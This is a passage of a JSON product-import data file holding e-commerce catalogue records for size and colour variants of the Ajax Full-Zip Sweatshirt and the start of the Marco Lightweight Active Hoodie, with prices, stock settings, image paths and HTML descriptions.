y\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"185\":{\"sku\":\"MH12-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -L-Blue\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"186\":{\"sku\":\"MH12-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -L-Green\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"187\":{\"sku\":\"MH12-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -L-Red\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"188\":{\"sku\":\"MH12-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -XL-Blue\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"189\":{\"sku\":\"MH12-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -XL-Green\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"190\":{\"sku\":\"MH12-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -XL-Red\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"191\":{\"sku\":\"MH12\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt \",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Fleece|Polyester,pattern=Striped,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH12-XS-Blue,size=XS,color=Blue|sku=MH12-XS-Green,size=XS,color=Green|sku=MH12-XS-Red,size=XS,color=Red|sku=MH12-S-Blue,size=S,color=Blue|sku=MH12-S-Green,size=S,color=Green|sku=MH12-S-Red,size=S,color=Red|sku=MH12-M-Blue,size=M,color=Blue|sku=MH12-M-Green,size=M,color=Green|sku=MH12-M-Red,size=M,color=Red|sku=MH12-L-Blue,size=L,color=Blue|sku=MH12-L-Green,size=L,color=Green|sku=MH12-L-Red,size=L,color=Red|sku=MH12-XL-Blue,size=XL,color=Blue|sku=MH12-XL-Green,size=XL,color=Green|sku=MH12-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Fleece|Polyester\",\"pattern\":\"Striped\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"192\":{\"sku\":\"MH13-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-XS-Blue\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"74\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"marco-lightweight-active-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh13-blue_alt1.jpg,\\/m\\/h\\/mh13-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"193\":{\"sku\":\"MH13-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Marco Lightweight Active Hoodie-XS-Green\",\"description\":\"<p>For cold-weather training or post-game layering, you need something more than a basic fleece. Our Marco Lightweight Active Hoodie brings both style and performance to the plate, court, or touchline. The smooth-faced, brushed-back fabric blocks wind and traps body heat, while integrated Cocona&reg; fibers pull moisture away.<\\/p>\\n<p>&bull; Light blue heather full zip hoodie.<br \\/>&bull; Fitted flatlock seams.<br \\/>&bull; Matching lining and drawstring. <br \\/>&bull; Machine 